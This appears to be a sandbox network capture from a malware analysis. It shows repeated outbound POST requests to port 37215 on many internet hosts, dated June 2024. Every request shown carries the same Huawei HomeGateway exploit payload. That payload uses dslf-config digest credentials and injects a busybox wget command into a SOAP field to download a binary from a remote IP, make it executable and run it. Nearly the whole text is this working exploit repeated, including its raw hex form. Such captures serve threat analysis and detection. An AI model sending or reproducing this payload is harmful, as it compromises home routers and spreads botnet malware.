                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              82192.168.2.153467245.128.218.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034538031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              83192.168.2.1556410222.131.176.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034575939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              84192.168.2.156001231.106.136.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034607887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              85192.168.2.1537926186.2.182.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034646034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              86192.168.2.1557280181.24.230.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034650087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              87192.168.2.1533010210.4.91.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034665108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              88192.168.2.1534410186.12.247.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034708023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              89192.168.2.1544794138.50.20.14837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034744978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              90192.168.2.1546678138.218.166.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034746885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              91192.168.2.153897641.114.180.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034790993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              92192.168.2.154905894.113.217.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034791946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
